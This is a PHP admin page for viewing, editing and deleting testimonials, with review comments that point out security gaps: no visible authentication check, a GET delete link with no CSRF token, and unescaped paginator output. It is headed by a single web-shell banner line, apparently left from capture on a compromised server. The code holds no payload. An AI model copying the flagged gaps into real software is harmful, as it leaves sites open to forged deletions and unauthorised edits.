.:: :[ AK-74 Security Team Web-shell ]: ::.
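<?php
/**
 * Admin page: list, edit and delete rows of the `testimonials` table.
 *
 * Request parameters read by this page:
 *   GET  task   = view | edit   panel to render
 *   GET  page   = 1-based page number of the listing
 *   GET  action = delete        delete the row named by GET id
 *   GET  id     = row id used by task=edit and action=delete
 *   POST action = edit          save the edit form via $admin->edit_testimonials()
 *
 * $db, the Admin class, ADMINURL and the session are not defined in this file;
 * presumably inc/function.php supplies them -- confirm.
 *
 * NOTE(review): no authentication or authorisation check is visible in this
 * file. Confirm that inc/function.php rejects unauthenticated requests before
 * the delete/edit handlers below run.
 *
 * NOTE(review): the delete handler is reached through a plain GET link and
 * neither it nor the edit form carries an anti-CSRF token, so a state change
 * can be triggered by any request that rides the admin's session. Moving
 * delete to POST with a per-session token is the proper fix; it is not done
 * here because edit_testimonials() receives the whole $_POST and how it treats
 * extra keys is not visible from this file.
 */
include_once 'inc/function.php';
include_once('inc/paginator.class.php');

$admin = new Admin();
$pages = new Paginator;

// HTML-escape a value for element content or a quoted attribute.
// ENT_SUBSTITUTE keeps a field with an invalid byte sequence (e.g. one cut
// mid-character by substr) from collapsing to an empty string.
$escHtml = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE);
};

// Read every request parameter once, tolerating missing or array-valued input.
$reqTask       = (isset($_GET['task']) && is_string($_GET['task'])) ? $_GET['task'] : '';
$reqAction     = (isset($_GET['action']) && is_string($_GET['action'])) ? $_GET['action'] : '';
$reqPostAction = (isset($_POST['action']) && is_string($_POST['action'])) ? $_POST['action'] : '';
$reqPageRaw    = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : '';
$reqPage       = max(1, (int) $reqPageRaw); // a missing or non-numeric page used to yield a negative offset
// Ids are handled as integers: the listing already emits them unquoted into
// onclick handlers, so non-numeric ids could not have worked -- confirm column type.
$reqId         = (isset($_GET['id']) && is_scalar($_GET['id'])) ? (int) $_GET['id'] : 0;

// Everything in the query string after the leading "task=view&page=N"
// (15 characters plus the length of N).
// NOTE(review): this is request-controlled text handed to the paginator, whose
// output is printed as raw HTML below; verify displayHtmlPages() escapes it.
$weburl = substr($_SERVER['QUERY_STRING'], strlen($reqPageRaw) + 15);

$query      = "SELECT * FROM `testimonials`";
$get_rows   = $admin->get_rows_by_query($db, $query);
$per_page   = 50;
$start      = ($reqPage - 1) * $per_page;
$pagination = $pages->displayHtmlPages($reqPage, $get_rows, $per_page, $weburl);

// Defaults so the edit form renders empty fields when no row is found.
$result = ['id' => '', 'name' => '', 'city' => '', 'content' => '', 'status' => ''];

if (isset($_GET['action']) || isset($_GET['task'])) {
    if ($reqAction === 'delete' && $reqId > 0) {
        // Bound parameter instead of concatenating $_GET['id'] into the SQL text.
        $stmt = mysqli_prepare($db, 'DELETE FROM `testimonials` WHERE id = ?');
        if ($stmt) {
            mysqli_stmt_bind_param($stmt, 'i', $reqId);
            // Report success only when the statement actually ran.
            if (mysqli_stmt_execute($stmt)) {
                $_SESSION['success'] = "Testimonials Deleted Successfully";
            }
            mysqli_stmt_close($stmt);
        }
    }

    if ($reqPostAction === 'edit') {
        // NOTE(review): the whole $_POST array goes to edit_testimonials();
        // its query construction is not visible here -- verify it binds values.
        $response = $admin->edit_testimonials($db, $_POST);
        if ($response) {
            $_SESSION['success'] = "Testimonials Updated Successfully";
        }
    }

    if ($reqTask === 'edit' && $reqId > 0) {
        $stmt = mysqli_prepare($db, 'SELECT * FROM testimonials WHERE id = ?');
        if ($stmt) {
            mysqli_stmt_bind_param($stmt, 'i', $reqId);
            if (mysqli_stmt_execute($stmt)) {
                // mysqli_stmt_get_result() requires the mysqlnd driver.
                $rowSet  = mysqli_stmt_get_result($stmt);
                $fetched = $rowSet ? mysqli_fetch_array($rowSet) : null;
                if (is_array($fetched)) {
                    $result = $fetched;
                }
            }
            mysqli_stmt_close($stmt);
        }
    }
}

include_once 'inc/header.php';
?>
<div id="content" class="container-fluid">
    <ol class="breadcrumb">
        <li>Home</li>
        <li>Testimonials Management</li>
        <li>View Testimonials</li>
    </ol>

    <?php if (!empty($_SESSION['success'])) { ?>
    <div class="alert alert-success">
        <strong>Success!</strong> <?=$_SESSION['success']?>
    </div>
    <?php unset($_SESSION['success']); } ?>

    <?php if ($reqTask === 'view') { ?>
    <div class="panel panel-default">
        <div class="panel-heading">
            <div class="pull-right">
                <a href="add-testimonials.php" class="btn btn-primary"><i class="fa fa-plus"></i></a>
            </div>
            <h1 class="panel-title"><i class="fa fa-comments"></i> View Testimonials</h1>
        </div>
        <div class="panel-body">
            <form method="post" id="table-enquiry">
                <div class="table-responsive">
                    <table class="table table-striped table-bordered table-hover">
                        <tr>
                            <th class="text-left">S.No.</th>
                            <th class="text-left">Name</th>
                            <th class="text-left">City</th>
                            <th class="text-left">Content</th>
                            <th class="text-left">Status</th>
                            <th class="text-right">Action</th>
                        </tr>
                        <?php
                        $i    = $start + 1;
                        $apps = $admin->get_filter_data_by_page_id($db, $query, $start, $per_page, 'id', 'desc');
                        // Rows are read by key rather than extract()ed, so a column name
                        // can never overwrite $db, $admin or another local variable.
                        // Every stored field is escaped on output: testimonial text is
                        // stored input and must not reach the admin's browser as markup.
                        foreach ((is_array($apps) ? $apps : []) as $app):
                            $appId = (int) $app['id'];
                        ?>
                        <tr>
                            <td class="text-left"><?=$i?></td>
                            <td class="text-left"><?=$escHtml($app['name'])?></td>
                            <td class="text-left"><?=$escHtml($app['city'])?></td>
                            <td class="text-left"><?=$escHtml(substr($app['content'], 0, 50) . '...')?></td>
                            <td class="text-left"><?=$escHtml($app['status'])?></td>
                            <td class="text-right">
                                <a data-toggle="modal" data-target="#testimonials" onclick="get_testimonials(<?=$appId?>)" class="btn btn-primary btn-xs"><span title="View" data-toggle="tooltip"><i class="fa fa-search"></i></span></a>
                                <a href="view-testimonials.php?task=edit&id=<?=$appId?>" class="btn btn-success btn-xs" title="Edit" data-toggle="tooltip"><i class="fa fa-pencil"></i></a>
                                <a href="javascript:void(0)" onClick="deleteAction(<?=$appId?>)" title="Delete" data-toggle="tooltip" class="btn btn-danger btn-xs"><i class="fa fa-times"></i></a>
                            </td>
                        </tr>
                        <?php
                            $i++;
                        endforeach;
                        ?>
                        <?php if ($get_rows == 0) { ?>
                        <tr>
                            <td class="text-center danger" colspan="6"><p> </p><h4>Sorry, No Data Found</h4></td>
                        </tr>
                        <?php } ?>
                    </table>
                    <center>
                        <ul class="pagination">
                            <?php /* Paginator output is HTML and is printed unescaped. */ print_r($pagination); ?>
                        </ul>
                    </center>
                </div>
            </form>
        </div>
    </div>
    <?php } if ($reqTask === 'edit') { ?>
    <div class="panel panel-default">
        <div class="panel-heading">
            <div class="pull-right">
                <button type="submit" form="form-testimonials" title="Save" data-toggle="tooltip" class="btn btn-success"><i class="fa fa-save"></i></button>
                <a href="view-testimonials.php?task=view&page=1" title="Cancel" data-toggle="tooltip" class="btn btn-danger"><i class="fa fa-times"></i></a>
            </div>
            <h1 class="panel-title"><i class="fa fa-comments"></i> Edit Testimonials</h1>
        </div>
        <div class="panel-body">
            <form method="post" id="form-testimonials" class="form-horizontal"><br>
                <input type="hidden" name="action" value="edit">
                <input type="hidden" name="id" value="<?=$escHtml($result['id'])?>">
                <div class="form-group">
                    <label class="col-sm-2 control-label">Name</label>
                    <div class="col-sm-10">
                        <input type="text" name="name" class="form-control" value="<?=$escHtml($result['name'])?>">
                    </div>
                </div>
                <div class="form-group">
                    <label class="col-sm-2 control-label">City</label>
                    <div class="col-sm-10">
                        <input type="text" name="city" class="form-control" value="<?=$escHtml($result['city'])?>">
                    </div>
                </div>
                <div class="form-group">
                    <label class="col-sm-2 control-label">Content</label>
                    <div class="col-sm-10">
                        <textarea name="content" class="form-control" rows="5"><?=$escHtml($result['content'])?></textarea>
                    </div>
                </div>
                <div class="form-group">
                    <label class="col-sm-2 control-label">Status</label>
                    <div class="col-sm-10">
                        <select name="status" class="form-control">
                            <option value="Active" <?php if ($result['status'] == 'Active') { echo 'selected'; } ?>>Active</option>
                            <option value="Inactive" <?php if ($result['status'] == 'Inactive') { echo 'selected'; } ?>>In Active</option>
                        </select>
                    </div>
                </div>
            </form>
        </div>
    </div>
    <?php } ?>
</div>

<!-- Modal -->
<div id="testimonials" class="modal fade" role="dialog">
    <div class="modal-dialog">
        <div class="modal-content" id="testimonialsSuccess">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal">×</button>
            </div>
            <div class="modal-body">
                <p>Please wait...</p>
            </div>
        </div>
    </div>
</div>
<?php include_once 'inc/footer.php'; ?>
<?php
// NOTE(review): get_testimonials() below assigns the ajax-data.php response to
// innerHTML, so that endpoint must HTML-escape every stored field it returns;
// it is not visible from this file.
?>
<script>
function get_testimonials(id) {
    if (id.length != 0) {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function() {
            if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                document.getElementById("testimonialsSuccess").innerHTML = xmlhttp.responseText;
            }
        }
        xmlhttp.open("GET", "ajax-data.php?task=get-testimonials&id=" + encodeURIComponent(id), true);
        xmlhttp.send();
    }
}
</script>
<script type="text/javascript">
function deleteAction(id){
    var confirmmessage = "Are you sure you wish to proceed?";
    var goifokay = "<?=ADMINURL?>/view-testimonials.php?task=view&page=1&action=delete&id=" + encodeURIComponent(id);
    if (window.confirm(confirmmessage)){
        window.location = goifokay;
    } else {
        return false;
    }
}
</script>
<script type="text/javascript" src="<?=ADMINURL?>/js/system.js"></script>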